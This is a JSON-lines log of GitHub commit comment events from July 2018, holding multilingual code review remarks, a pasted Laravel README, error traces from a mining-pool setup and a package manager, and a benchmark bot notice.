{"id":"7921097513","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29601654,"position":4,"line":15,"path":"lesson7/train.rb","commit_id":"79c137d3ba65b8e7ddd075f94d0a1fa16a735226","created_at":"2018-07-05T05:51:59Z","updated_at":"2018-07-05T05:51:59Z","author_association":"NONE","body":"чтобы можно было валидировать для одного класса `id`, а для другого `name` можно пойти разными путями\r\n- либо создать два разных метода: `validate_uniqueness_of_id`, `validate_uniqueness_of_name`\r\n- либо создать один метод `validate_uniqueness_of` и ему передвать имя валидируемого аргумента в зависимости от класса... как-то так: `validate_uniqueness_of_id :id`... ну и код в методе придется соответственно поменять, но там уже метапрограммирование, наверное не стоит этим сейчас заморачиваться ))\r\n\r\nв любом случае нужно пойти одним из следующих путей:\r\n- методы эти либо должны быть написаны в самом классе и вызываться из метода `validate!`\r\n- либо код этих методов можно просто в `validate!` написать и отдельные методы не создавать\r\n- либо написать эти методы в модуле и опять же вызывать их из `validate!`\r\n\r\nесли реализовать таким образом, то это будет \"стандартная\" и ожидаемая реализация\r\nто что у тебя сейчас - это такой \"неожиданный сюрприз\", за который вряд ли дождешься благодарности от коллег )))"}},"created_at":"2018-07-05T05:51:59Z"}
{"id":"7921100856","type":"CommitCommentEvent","actor":{"login":"icemac"},"repo":{"name":"zopefoundation/zope.testrunner"},"payload":{"comment":{"id":29601659,"position":null,"line":null,"path":null,"commit_id":"e6659234c052ae9ec17a7185315d0e1db639c997","created_at":"2018-07-05T05:53:21Z","updated_at":"2018-07-05T05:53:21Z","author_association":"CONTRIBUTOR","body":"@jamadden Interesting idea."}},"created_at":"2018-07-05T05:53:21Z"}
{"id":"7921101417","type":"CommitCommentEvent","actor":{"login":"rashmi-surpur"},"repo":{"name":"rashmi-surpur/MyGitProject"},"payload":{"comment":{"id":29601660,"position":null,"line":null,"path":null,"commit_id":"16775c1a9ebd5710761ad8ce56042fa07915cee8","created_at":"2018-07-05T05:53:34Z","updated_at":"2018-07-05T05:53:34Z","author_association":"OWNER","body":"hi good job"}},"created_at":"2018-07-05T05:53:34Z"}
{"id":"7921114406","type":"CommitCommentEvent","actor":{"login":"arrowseeker"},"repo":{"name":"kcopper8/english-study"},"payload":{"comment":{"id":29601678,"position":18,"line":18,"path":"A New Refined CollectionView for Marionette.js/text.md","commit_id":"27d4d89bbdad5f605adba6d5293356d5dfec1cca","created_at":"2018-07-05T05:58:28Z","updated_at":"2018-07-05T05:58:28Z","author_association":"COLLABORATOR","body":"네, 여기서는 문맥상 alongside가 맞는 것 같습니다. 혹시 원어민들이 자주 범하는 오류인가 싶어 구글에 alongside or along side라고 찾아보니 alongside를 along side로 잘못 알고 쓰는 경우가 종종 있는 모양이에요😅"}},"created_at":"2018-07-05T05:58:28Z"}
{"id":"7921119956","type":"CommitCommentEvent","actor":{"login":"ZiSeFeng"},"repo":{"name":"ZiSeFeng/tada-demo"},"payload":{"comment":{"id":29601697,"position":null,"line":null,"path":null,"commit_id":"7c1979bdad2c002ee6657ca5e3f65b69b534ce1c","created_at":"2018-07-05T06:00:29Z","updated_at":"2018-07-05T06:00:29Z","author_association":"OWNER","body":"### 写md文件这么难写吗？没有想到github有自己的md编辑器啊\r\n**这个粗体**\r\n_这个是斜体_\r\n\r\n> \r\n\r\n> 引号吧\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-05T06:00:29Z"}
{"id":"7921120896","type":"CommitCommentEvent","actor":{"login":"arrowseeker"},"repo":{"name":"kcopper8/english-study"},"payload":{"comment":{"id":29601703,"position":30,"line":30,"path":"A New Refined CollectionView for Marionette.js/text.md","commit_id":"27d4d89bbdad5f605adba6d5293356d5dfec1cca","created_at":"2018-07-05T06:00:50Z","updated_at":"2018-07-05T06:00:50Z","author_association":"COLLABORATOR","body":"네! 여기서는 in doing so 다음에 콤마를 붙이는 것이 정확한 표현입니다."}},"created_at":"2018-07-05T06:00:50Z"}
{"id":"7921126169","type":"CommitCommentEvent","actor":{"login":"hamishwillee"},"repo":{"name":"ArduPilot/ardupilot_wiki"},"payload":{"comment":{"id":29601717,"position":null,"line":null,"path":null,"commit_id":"282d21e19346b30e6d2e2c13a7774277692e0172","created_at":"2018-07-05T06:02:45Z","updated_at":"2018-07-05T06:02:45Z","author_association":"CONTRIBUTOR","body":"Did you see my comment on adding to parent toctree?"}},"created_at":"2018-07-05T06:02:45Z"}
{"id":"7921130386","type":"CommitCommentEvent","actor":{"login":"rajlilawati"},"repo":{"name":"zhiwehu/Python-programming-exercises"},"payload":{"comment":{"id":29601722,"position":108,"line":910,"path":"100+ Python challenging programming exercises.txt","commit_id":"e379474ed8ca6a830bc9c0bb1742731fa3588bd2","created_at":"2018-07-05T06:04:11Z","updated_at":"2018-07-05T06:04:11Z","author_association":"NONE","body":"`  for i in range(2,15) :\r\n         print(\"hello\")`"}},"created_at":"2018-07-05T06:04:11Z"}
{"id":"7921130665","type":"CommitCommentEvent","actor":{"login":"ajayns"},"repo":{"name":"collective/gatsby-source-plone"},"payload":{"comment":{"id":29601723,"position":null,"line":null,"path":null,"commit_id":"c0d4dd17217608140a79e0ba833e02c8b93dfa91","created_at":"2018-07-05T06:04:16Z","updated_at":"2018-07-05T06:04:16Z","author_association":"CONTRIBUTOR","body":"I'll pull the changes and merge before I merge back to master"}},"created_at":"2018-07-05T06:04:16Z"}
{"id":"7921132647","type":"CommitCommentEvent","actor":{"login":"Wolf480pl"},"repo":{"name":"sio2project/sio2jail"},"payload":{"comment":{"id":29601725,"position":22,"line":137,"path":"src/s2japp/Application.cc","commit_id":"52b89569907ee8b12c5f1ef9e962193a0f7bd011","created_at":"2018-07-05T06:04:56Z","updated_at":"2018-07-05T06:04:56Z","author_association":"MEMBER","body":"Do we use std::cerr anywhere else? If so, won't these  conflict because of libc caching and whatnot?"}},"created_at":"2018-07-05T06:04:56Z"}
{"id":"7921136534","type":"CommitCommentEvent","actor":{"login":"arrowseeker"},"repo":{"name":"kcopper8/english-study"},"payload":{"comment":{"id":29601731,"position":30,"line":30,"path":"A New Refined CollectionView for Marionette.js/text.md","commit_id":"27d4d89bbdad5f605adba6d5293356d5dfec1cca","created_at":"2018-07-05T06:06:08Z","updated_at":"2018-07-05T06:06:08Z","author_association":"COLLABORATOR","body":"그리고 미래의 의도나 의사를 말할 때 will be ~ing 라는 표현은 반드시 진행형을 살려 번역하지 않아도 됩니다. 소개하고 있을 겁니다 or 소개할 것입니다 중 자연스럽게 느껴지시는 쪽으로 선택하시면 될 것 같아요!"}},"created_at":"2018-07-05T06:06:08Z"}
{"id":"7921139368","type":"CommitCommentEvent","actor":{"login":"hhyyrylainen"},"repo":{"name":"Revolutionary-Games/Thrive"},"payload":{"comment":{"id":29601737,"position":15,"line":287,"path":"scripts/microbe_stage/microbe_ai.as","commit_id":"5e610c21f562bef8e2041d3eeaf97711838a0b98","created_at":"2018-07-05T06:07:04Z","updated_at":"2018-07-05T06:07:04Z","author_association":"CONTRIBUTOR","body":"If I remember correctly the get species component is one of the most expensive methods so I think the id of the species entity should be used here instead (the spawn method should be modified to store the species I'd in the microbe component) "}},"created_at":"2018-07-05T06:07:04Z"}
{"id":"7921141354","type":"CommitCommentEvent","actor":{"login":"hixichen"},"repo":{"name":"truechain/truechain-consensus-core"},"payload":{"comment":{"id":29601741,"position":null,"line":null,"path":null,"commit_id":"c418cbe70f1194eaf31a6256efa750cc48ff64af","created_at":"2018-07-05T06:07:43Z","updated_at":"2018-07-05T06:07:43Z","author_association":"CONTRIBUTOR","body":"1. Please do not ignore any error unless you have comments there. \r\n\r\n2. Please note: \"golang.org/x/net/context\", this context is quite different from its native \"context\" package. \r\n\r\n3. I saw you had added some packages. Could you please add them to the manifest file under ~/src/verdor\r\n  "}},"created_at":"2018-07-05T06:07:43Z"}
{"id":"7921145397","type":"CommitCommentEvent","actor":{"login":"futurejones"},"repo":{"name":"apple/swift-compiler-rt"},"payload":{"comment":{"id":29601746,"position":null,"line":null,"path":null,"commit_id":"094e5f339071fbaa7141dc7b659ffae9965723b2","created_at":"2018-07-05T06:09:02Z","updated_at":"2018-07-05T06:09:02Z","author_association":"NONE","body":"@petrhosek Can we get this added to the \"swift-4.2-branch\" and the \"stable\" branch.\r\nHardcoding target architecture to x86_64 is breaking the swift-4.2-branch and master builds in https://ci-external.swift.org/computer/ubuntu-16.04-aarch64/\r\nThanks"}},"created_at":"2018-07-05T06:09:02Z"}
{"id":"7921146914","type":"CommitCommentEvent","actor":{"login":"khuzan"},"repo":{"name":"khuzan/Borrowing_system"},"payload":{"comment":{"id":29601748,"position":null,"line":null,"path":null,"commit_id":"e43d1ff0a0808ff9ef402520e33749b5635ceef3","created_at":"2018-07-05T06:09:34Z","updated_at":"2018-07-05T06:09:34Z","author_association":"OWNER","body":"\r\nBuild Status Total Downloads Latest Stable Version License\r\n\r\nAbout Laravel\r\nLaravel is a web application framework with expressive, elegant syntax. We believe development must be an enjoyable and creative experience to be truly fulfilling. Laravel attempts to take the pain out of development by easing common tasks used in the majority of web projects, such as:\r\n\r\nSimple, fast routing engine.\r\nPowerful dependency injection container.\r\nMultiple back-ends for session and cache storage.\r\nExpressive, intuitive database ORM.\r\nDatabase agnostic schema migrations.\r\nRobust background job processing.\r\nReal-time event broadcasting.\r\nLaravel is accessible, yet powerful, providing tools needed for large, robust applications.\r\n\r\nLearning Laravel\r\nLaravel has the most extensive and thorough documentation and video tutorial library of any modern web application framework, making it a breeze to get started learning the framework.\r\n\r\nIf you're not in the mood to read, Laracasts contains over 1100 video tutorials on a range of topics including Laravel, modern PHP, unit testing, JavaScript, and more. Boost the skill level of yourself and your entire team by digging into our comprehensive video library.\r\n\r\nLaravel Sponsors\r\nWe would like to extend our thanks to the following sponsors for helping fund on-going Laravel development. If you are interested in becoming a sponsor, please visit the Laravel Patreon page:\r\n\r\nVehikl\r\nTighten Co.\r\nKirschbaum Development Group\r\nCubet Techno Labs\r\nBritish Software Development\r\nUserInsights\r\nFragrantica\r\nSOFTonSOFA\r\nUser10\r\nSoumettre.fr\r\nCodeBrisk\r\n1Forge\r\nTECPRESSO\r\nRuntime Converter\r\nWebL'Agence\r\nInvoice Ninja\r\niMi digital\r\nContributing\r\nThank you for considering contributing to the Laravel framework! The contribution guide can be found in the Laravel documentation.\r\n\r\nSecurity Vulnerabilities\r\nIf you discover a security vulnerability within Laravel, please send an e-mail to Taylor Otwell via taylor@laravel.com. All security vulnerabilities will be promptly addressed.\r\n\r\nLicense\r\nThe Laravel framework is open-sourced software licensed under the MIT license."}},"created_at":"2018-07-05T06:09:34Z"}
{"id":"7921154849","type":"CommitCommentEvent","actor":{"login":"857487"},"repo":{"name":"globaltoken/node-open-mining-portal"},"payload":{"comment":{"id":29601756,"position":null,"line":null,"path":null,"commit_id":"8a62f6a75b838ea16fcf7d9f7ffda0b14b4576b2","created_at":"2018-07-05T06:12:17Z","updated_at":"2018-07-05T06:12:17Z","author_association":"NONE","body":"Hello!There are the following errors in running node init.js. Coin.json, poo_config/coin.json and config.json are all configured correctly, which is an encrypted currency of blake2b algorithm.\r\n\r\n2018-07-05 14:08:38 [POSIX]\t[Connection Limit] (Safe to ignore) POSIX module not installed and resource (connection) limit was not raised\r\n2018-07-05 14:08:38 [Master]\t[CLI] CLI listening on port 17117\r\n2018-07-05 14:08:38 [Website]\t[Server] Website started on 0.0.0.0:88\r\n/root/pool/nomp/libs/website.js:162\r\n                    if(poolConfigs.coin.algorithm === \"equihash\")\r\n                                        ^\r\n\r\nTypeError: Cannot read property 'algorithm' of undefined\r\n    at /root/pool/nomp/libs/website.js:162:41\r\n    at /root/pool/nomp/node_modules/async/lib/async.js:181:20\r\n    at Object.async.forEachOf.async.eachOf (/root/pool/nomp/node_modules/async/lib/async.js:233:13)\r\n    at Object.async.forEach.async.each (/root/pool/nomp/node_modules/async/lib/async.js:209:22)\r\n    at /root/pool/nomp/libs/website.js:151:23\r\n    at fn (/root/pool/nomp/node_modules/async/lib/async.js:746:34)\r\n    at /root/pool/nomp/node_modules/async/lib/async.js:1213:16\r\n    at /root/pool/nomp/node_modules/async/lib/async.js:166:37\r\n    at /root/pool/nomp/node_modules/async/lib/async.js:706:43\r\n    at /root/pool/nomp/node_modules/async/lib/async.js:167:37\r\n2018-07-05 14:08:38 [Master]\t[Website] Website process died, spawning replacement...\r\n/root/pool/nomp/node_modules/stratum-pool/lib/pool.js:33\r\n        throw new Error();\r\n        ^\r\n\r\nError\r\n    at new pool (/root/pool/nomp/node_modules/stratum-pool/lib/pool.js:33:15)\r\n    at Object.exports.createPool (/root/pool/nomp/node_modules/stratum-pool/lib/index.js:14:19)\r\n    at /root/pool/nomp/libs/poolWorker.js:183:28\r\n    at Array.forEach (<anonymous>)\r\n    at new module.exports (/root/pool/nomp/libs/poolWorker.js:98:30)\r\n    at Object.<anonymous> (/root/pool/nomp/init.js:74:13)\r\n    at Module._compile (module.js:652:30)\r\n    at Object.Module._extensions..js (module.js:663:10)\r\n    at Module.load (module.js:565:32)\r\n    at tryModuleLoad (module.js:505:12)\r\n2018-07-05 14:08:39 [Master]\t[PoolSpawner] Fork 0 died, spawning replacement worker...\r\n/root/pool/nomp/node_modules/stratum-pool/lib/pool.js:33\r\n        throw new Error();\r\n        ^\r\n\r\nError\r\n    at new pool (/root/pool/nomp/node_modules/stratum-pool/lib/pool.js:33:15)\r\n    at Object.exports.createPool (/root/pool/nomp/node_modules/stratum-pool/lib/index.js:14:19)\r\n    at /root/pool/nomp/libs/poolWorker.js:183:28\r\n    at Array.forEach (<anonymous>)\r\n    at new module.exports (/root/pool/nomp/libs/poolWorker.js:98:30)\r\n    at Object.<anonymous> (/root/pool/nomp/init.js:74:13)\r\n    at Module._compile (module.js:652:30)\r\n    at Object.Module._extensions..js (module.js:663:10)\r\n    at Module.load (module.js:565:32)\r\n    at tryModuleLoad (module.js:505:12)\r\n2018-07-05 14:08:39 [Master]\t[PoolSpawner] Fork 1 died, spawning replacement worker...\r\n/root/pool/nomp/node_modules/stratum-pool/lib/pool.js:33\r\n        throw new Error();\r\n        ^\r\n\r\nError\r\n    at new pool (/root/pool/nomp/node_modules/stratum-pool/lib/pool.js:33:15)\r\n    at Object.exports.createPool (/root/pool/nomp/node_modules/stratum-pool/lib/index.js:14:19)\r\n    at /root/pool/nomp/libs/poolWorker.js:183:28\r\n    at Array.forEach (<anonymous>)\r\n    at new module.exports (/root/pool/nomp/libs/poolWorker.js:98:30)\r\n    at Object.<anonymous> (/root/pool/nomp/init.js:74:13)\r\n    at Module._compile (module.js:652:30)\r\n    at Object.Module._extensions..js (module.js:663:10)\r\n    at Module.load (module.js:565:32)\r\n    at tryModuleLoad (module.js:505:12)\r\n2018-07-05 14:08:39 [Master]\t[PoolSpawner] Fork 2 died, spawning replacement worker...\r\n/root/pool/nomp/node_modules/stratum-pool/lib/pool.js:33\r\n        throw new Error();\r\n        ^\r\n\r\nError\r\n    at new pool (/root/pool/nomp/node_modules/stratum-pool/lib/pool.js:33:15)\r\n    at Object.exports.createPool (/root/pool/nomp/node_modules/stratum-pool/lib/index.js:14:19)\r\n    at /root/pool/nomp/libs/poolWorker.js:183:28\r\n    at Array.forEach (<anonymous>)\r\n    at new module.exports (/root/pool/nomp/libs/poolWorker.js:98:30)\r\n    at Object.<anonymous> (/root/pool/nomp/init.js:74:13)\r\n    at Module._compile (module.js:652:30)\r\n    at Object.Module._extensions..js (module.js:663:10)\r\n    at Module.load (module.js:565:32)\r\n    at tryModuleLoad (module.js:505:12)\r\n2018-07-05 14:08:39 [Master]\t[PoolSpawner] Fork 3 died, spawning replacement worker...\r\n/root/pool/nomp/node_modules/stratum-pool/lib/pool.js:33\r\n        throw new Error();\r\n        ^\r\n\r\nError\r\n    at new pool (/root/pool/nomp/node_modules/stratum-pool/lib/pool.js:33:15)\r\n    at Object.exports.createPool (/root/pool/nomp/node_modules/stratum-pool/lib/index.js:14:19)\r\n    at /root/pool/nomp/libs/poolWorker.js:183:28\r\n    at Array.forEach (<anonymous>)\r\n    at new module.exports (/root/pool/nomp/libs/poolWorker.js:98:30)\r\n    at Object.<anonymous> (/root/pool/nomp/init.js:74:13)\r\n    at Module._compile (module.js:652:30)\r\n    at Object.Module._extensions..js (module.js:663:10)\r\n    at Module.load (module.js:565:32)\r\n    at tryModuleLoad (module.js:505:12)\r\n2018-07-05 14:08:39 [Master]\t[PoolSpawner] Fork 4 died, spawning replacement worker...\r\n/root/pool/nomp/node_modules/stratum-pool/lib/pool.js:33\r\n        throw new Error();\r\n        ^\r\n\r\nError\r\n    at new pool (/root/pool/nomp/node_modules/stratum-pool/lib/pool.js:33:15)\r\n    at Object.exports.createPool (/root/pool/nomp/node_modules/stratum-pool/lib/index.js:14:19)\r\n    at /root/pool/nomp/libs/poolWorker.js:183:28\r\n    at Array.forEach (<anonymous>)\r\n    at new module.exports (/root/pool/nomp/libs/poolWorker.js:98:30)\r\n    at Object.<anonymous> (/root/pool/nomp/init.js:74:13)\r\n    at Module._compile (module.js:652:30)\r\n    at Object.Module._extensions..js (module.js:663:10)\r\n    at Module.load (module.js:565:32)\r\n    at tryModuleLoad (module.js:505:12)\r\n2018-07-05 14:08:40 [Master]\t[PoolSpawner] Fork 5 died, spawning replacement worker...\r\n/root/pool/nomp/node_modules/stratum-pool/lib/pool.js:33\r\n        throw new Error();\r\n        ^\r\n\r\nError\r\n    at new pool (/root/pool/nomp/node_modules/stratum-pool/lib/pool.js:33:15)\r\n    at Object.exports.createPool (/root/pool/nomp/node_modules/stratum-pool/lib/index.js:14:19)\r\n    at /root/pool/nomp/libs/poolWorker.js:183:28\r\n    at Array.forEach (<anonymous>)\r\n    at new module.exports (/root/pool/nomp/libs/poolWorker.js:98:30)\r\n    at Object.<anonymous> (/root/pool/nomp/init.js:74:13)\r\n    at Module._compile (module.js:652:30)\r\n    at Object.Module._extensions..js (module.js:663:10)\r\n    at Module.load (module.js:565:32)\r\n    at tryModuleLoad (module.js:505:12)\r\n2018-07-05 14:08:40 [Master]\t[PoolSpawner] Fork 6 died, spawning replacement worker...\r\n/root/pool/nomp/node_modules/stratum-pool/lib/pool.js:33\r\n        throw new Error();\r\n        ^\r\n\r\nError\r\n    at new pool (/root/pool/nomp/node_modules/stratum-pool/lib/pool.js:33:15)\r\n    at Object.exports.createPool (/root/pool/nomp/node_modules/stratum-pool/lib/index.js:14:19)\r\n    at /root/pool/nomp/libs/poolWorker.js:183:28\r\n    at Array.forEach (<anonymous>)\r\n    at new module.exports (/root/pool/nomp/libs/poolWorker.js:98:30)\r\n    at Object.<anonymous> (/root/pool/nomp/init.js:74:13)\r\n    at Module._compile (module.js:652:30)\r\n    at Object.Module._extensions..js (module.js:663:10)\r\n    at Module.load (module.js:565:32)\r\n    at tryModuleLoad (module.js:505:12)\r\n2018-07-05 14:08:40 [Master]\t[PoolSpawner] Fork 7 died, spawning replacement worker...\r\n2018-07-05 14:08:40 [Master]\t[PoolSpawner] Spawned 1 pool(s) on 10 thread(s)\r\n/root/pool/nomp/node_modules/stratum-pool/lib/pool.js:33\r\n        throw new Error();\r\n        ^\r\n\r\nError\r\n    at new pool (/root/pool/nomp/node_modules/stratum-pool/lib/pool.js:33:15)\r\n    at Object.exports.createPool (/root/pool/nomp/node_modules/stratum-pool/lib/index.js:14:19)\r\n    at /root/pool/nomp/libs/poolWorker.js:183:28\r\n    at Array.forEach (<anonymous>)\r\n    at new module.exports (/root/pool/nomp/libs/poolWorker.js:98:30)\r\n    at Object.<anonymous> (/root/pool/nomp/init.js:74:13)\r\n    at Module._compile (module.js:652:30)\r\n    at Object.Module._extensions..js (module.js:663:10)\r\n    at Module.load (module.js:565:32)\r\n    at tryModuleLoad (module.js:505:12)\r\n2018-07-05 14:08:40 [Master]\t[PoolSpawner] Fork 8 died, spawning replacement worker...\r\n^C\r\n"}},"created_at":"2018-07-05T06:12:17Z"}
{"id":"7921157544","type":"CommitCommentEvent","actor":{"login":"arrowseeker"},"repo":{"name":"kcopper8/english-study"},"payload":{"comment":{"id":29601760,"position":37,"line":37,"path":"A New Refined CollectionView for Marionette.js/text.md","commit_id":"27d4d89bbdad5f605adba6d5293356d5dfec1cca","created_at":"2018-07-05T06:13:11Z","updated_at":"2018-07-05T06:13:11Z","author_association":"COLLABORATOR","body":"앗 battle test는 자주 쓰이지는 않지만 두 단어가 합쳐져서 '실전으로 테스트하다'라는 뜻의 동사가 됩니다! 보통은 battle-test 로 중간에 하이픈을 넣어 표기하고, 동사 원형보다는 battle-tested (실전으로 테스트된) 의 형태로 많이 쓰여요. 메리암 웹스터에도 이 형태로 등재되어 있네요. 제가 여기서 바로 battle이 명사가 아니라 뒤의 tested와 이어지는 단어라는 걸 안 건, battle이 명사이려면 that needs to be battle 의 battle 앞에 부정관사 a가 와야 하기 때문이에요. '전투가 되어야만 하는 코드'에서 전투는 특정한 전투를 지칭하는 것이 아닐 테니까요!\r\n그래서 이 부분을 해석하면 '현실에서 실전을 통해 테스트되어야 하는 많은 새 코드' 정도가 되겠네요."}},"created_at":"2018-07-05T06:13:11Z"}
{"id":"7921159371","type":"CommitCommentEvent","actor":{"login":"icemac"},"repo":{"name":"zopefoundation/Zope"},"payload":{"comment":{"id":29601762,"position":20,"line":858,"path":"src/OFS/ObjectManager.py","commit_id":"d8901f6c940386adf4883471f6ca290981e86a66","created_at":"2018-07-05T06:13:46Z","updated_at":"2018-07-05T06:13:46Z","author_association":"CONTRIBUTOR","body":"@drfho There are currently some known bugs in Zope 4 in the issue tracker which lead to an exception, e. g. zopefoundation/Zope#287. Is this kind of exception enough or are you looking for something more specific?"}},"created_at":"2018-07-05T06:13:46Z"}
{"id":"7921171199","type":"CommitCommentEvent","actor":{"login":"alium"},"repo":{"name":"artix-linux/packages-galaxy"},"payload":{"comment":{"id":29601785,"position":null,"line":null,"path":null,"commit_id":"66c8998afd01c89ca2ec2039ef9411a27a64782e","created_at":"2018-07-05T06:17:49Z","updated_at":"2018-07-05T06:17:49Z","author_association":"CONTRIBUTOR","body":"still problem with dependencies:\r\n\r\nchecking keyring...\r\nchecking package integrity...\r\nloading package files...\r\nchecking for file conflicts...\r\nerror: failed to commit transaction (conflicting files)\r\nlibsystemd: /usr/lib/libudev.so exists in filesystem (owned by libeudev)\r\nlibsystemd: /usr/lib/libudev.so.1 exists in filesystem (owned by libeudev)\r\nErrors occurred, no packages were upgraded.\r\n==> ERROR: 'pacman' failed to install missing dependencies.\r\n"}},"created_at":"2018-07-05T06:17:49Z"}
{"id":"7921175750","type":"CommitCommentEvent","actor":{"login":"TimMoore"},"repo":{"name":"akka/akka-persistence-cassandra"},"payload":{"comment":{"id":29601795,"position":4,"line":98,"path":"core/src/main/scala/akka/persistence/cassandra/ConfigSessionProvider.scala","commit_id":"36c29c2827ea2c0fdbd4376591d649cb857be626","created_at":"2018-07-05T06:19:18Z","updated_at":"2018-07-05T06:19:18Z","author_association":"COLLABORATOR","body":"Might be good to make this conditional on whether the `max-queue-size` config path exists (since people can pass in any `Config` object and it might not be taken from the `reference.conf` sections above).\r\n\r\nThis is currently causing the Scala 2.12 community build for Lagom to break with the latest Akka Persistence Cassandra: https://scala-ci.typesafe.com/view/scala-2.12.x/job/scala-2.12.x-integrate-community-build/3048/consoleFull.\r\n\r\nWe can add the property to Lagom's config of course, but if people are happy with the idea of setting this conditionally, I can send a pull request. The main question would be whether we should do the same with all properties."}},"created_at":"2018-07-05T06:19:18Z"}
{"id":"7921184972","type":"CommitCommentEvent","actor":{"login":"chelmuth"},"repo":{"name":"ValiValpas/genode"},"payload":{"comment":{"id":29601824,"position":14,"line":46,"path":"repos/os/src/lib/vfs/rom_file_system.h","commit_id":"c27aa37803ac365343f49ae0f2bf24e8db1c061c","created_at":"2018-07-05T06:22:15Z","updated_at":"2018-07-05T06:22:15Z","author_association":"NONE","body":"I'd like to note that it may be more robust to stay with the default `binary==true`. Do you agree?"}},"created_at":"2018-07-05T06:22:15Z"}
{"id":"7921206823","type":"CommitCommentEvent","actor":{"login":"geniousisme"},"repo":{"name":"X-Capital/website"},"payload":{"comment":{"id":29601871,"position":null,"line":null,"path":null,"commit_id":"eaadc5aab2afc01373e6feb0445b368db5222f64","created_at":"2018-07-05T06:29:01Z","updated_at":"2018-07-05T06:29:01Z","author_association":"COLLABORATOR","body":"@denghonghao next time try to split these changes into separate diffs, it will be easier for next reviewer or someone in this team to understand what kind of result it will achieve with this change in the diff :)"}},"created_at":"2018-07-05T06:29:01Z"}
{"id":"7921210476","type":"CommitCommentEvent","actor":{"login":"hathach"},"repo":{"name":"adafruit/circuitpython"},"payload":{"comment":{"id":29601877,"position":null,"line":null,"path":null,"commit_id":"7fff7f5e70c652ccffce2a598a4e3b7df92ad67b","created_at":"2018-07-05T06:30:10Z","updated_at":"2018-07-05T06:30:10Z","author_association":"MEMBER","body":"@ladyada  yeah, mcu should only try to detect external flash if it is enabled with macro. Though, it is still useful if we support both since user can just hot plugged or wire extra QSPI Wing without to re-flash cp. The flash size on nrf52 is too big, that we could just fit everything in :D . I should focus on the basic to get it running  first though. \r\n\r\nBTW I think we should move here to discuss more :) \r\nhttps://github.com/adafruit/circuitpython/issues/956#issuecomment-402610195\r\n\r\n"}},"created_at":"2018-07-05T06:30:10Z"}
{"id":"7921218005","type":"CommitCommentEvent","actor":{"login":"adr1ancho"},"repo":{"name":"hmcts/ccd-data-store-api"},"payload":{"comment":{"id":29601886,"position":19,"line":35,"path":"src/main/java/uk/gov/hmcts/ccd/domain/service/aggregated/AbstractAuthorisedCaseViewOperation.java","commit_id":"23ec85558950a0a9cfa1116177d900ab4fc9d9a1","created_at":"2018-07-05T06:32:24Z","updated_at":"2018-07-05T06:32:24Z","author_association":"MEMBER","body":"The original checkstyle that I adopted was 120 characters but this has been altered by some team members.  "}},"created_at":"2018-07-05T06:32:24Z"}
{"id":"7921218182","type":"CommitCommentEvent","actor":{"login":"vindard"},"repo":{"name":"peakshift/telegram-dogecoin"},"payload":{"comment":{"id":29601888,"position":null,"line":null,"path":null,"commit_id":"1f38b5dfdea65b4f4e9fbc42a87cc4eb4af571a6","created_at":"2018-07-05T06:32:27Z","updated_at":"2018-07-05T06:32:27Z","author_association":"COLLABORATOR","body":"Price call was failing because I was testing with 'DOGECOIN-TEST' network which doesn't have a price attached to it. Added an exception to default the exchange-rate value to '0' in this scenario."}},"created_at":"2018-07-05T06:32:27Z"}
{"id":"7921220044","type":"CommitCommentEvent","actor":{"login":"boogheta"},"repo":{"name":"regardscitoyens/lawfactory_utils"},"payload":{"comment":{"id":29601891,"position":null,"line":null,"path":null,"commit_id":"6df5aab20dd212e5218d4ed0f1c825738a9d94c8","created_at":"2018-07-05T06:33:00Z","updated_at":"2018-07-05T06:33:00Z","author_association":"CONTRIBUTOR","body":"Can you point out the cases you encountered so we can try and put in the tests examples of both?"}},"created_at":"2018-07-05T06:33:00Z"}
{"id":"7921230172","type":"CommitCommentEvent","actor":{"login":"adr1ancho"},"repo":{"name":"hmcts/ccd-data-store-api"},"payload":{"comment":{"id":29601915,"position":39,"line":82,"path":"src/main/java/uk/gov/hmcts/ccd/domain/service/aggregated/AbstractDefaultGetCaseViewOperation.java","commit_id":"23ec85558950a0a9cfa1116177d900ab4fc9d9a1","created_at":"2018-07-05T06:35:58Z","updated_at":"2018-07-05T06:35:58Z","author_association":"MEMBER","body":"120 characters was what I adopted but the line length has since been changed by some team members.  I'd like to argue for 120 characters myself.  My earlier question was that could you also have your ide lined up the arguments but this is no big deal"}},"created_at":"2018-07-05T06:35:58Z"}
{"id":"7921236584","type":"CommitCommentEvent","actor":{"login":"adr1ancho"},"repo":{"name":"hmcts/ccd-data-store-api"},"payload":{"comment":{"id":29601929,"position":19,"line":35,"path":"src/main/java/uk/gov/hmcts/ccd/domain/service/aggregated/AbstractAuthorisedCaseViewOperation.java","commit_id":"23ec85558950a0a9cfa1116177d900ab4fc9d9a1","created_at":"2018-07-05T06:37:50Z","updated_at":"2018-07-05T06:37:50Z","author_association":"MEMBER","body":"could we not have \r\n\r\nthrow new ResourceNotFoundException(NO_CASE_TYPE_FOUND)\r\n    .withDetails(NO_CASE_TYPE_FOUND_DETAILS);\r\n\r\nas one statement.  It was merely a question from me\r\n"}},"created_at":"2018-07-05T06:37:50Z"}
{"id":"7921239123","type":"CommitCommentEvent","actor":{"login":"platinum4"},"repo":{"name":"Quake4/MindMiner"},"payload":{"comment":{"id":29601935,"position":null,"line":null,"path":null,"commit_id":"04bc592d58a7d1c7a7ef09e53aec96d3db02fc50","created_at":"2018-07-05T06:38:35Z","updated_at":"2018-07-05T06:38:35Z","author_association":"NONE","body":"Does not show ETH, put in API key in pool config too"}},"created_at":"2018-07-05T06:38:35Z"}
{"id":"7921240237","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29601939,"position":null,"line":null,"path":null,"commit_id":"ee07b8cb23e5330d25d0b05accdc0278997a0b3f","created_at":"2018-07-05T06:38:53Z","updated_at":"2018-07-05T06:38:53Z","author_association":"NONE","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/ee07b8cb23e5330d25d0b05accdc0278997a0b3f#commitcomment-29601204) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/aae8602076c2b5e5ebd4a93f3d056318d86ffac4/daily_2018_7_5/report.md). cc @ararslan"}},"created_at":"2018-07-05T06:38:53Z"}
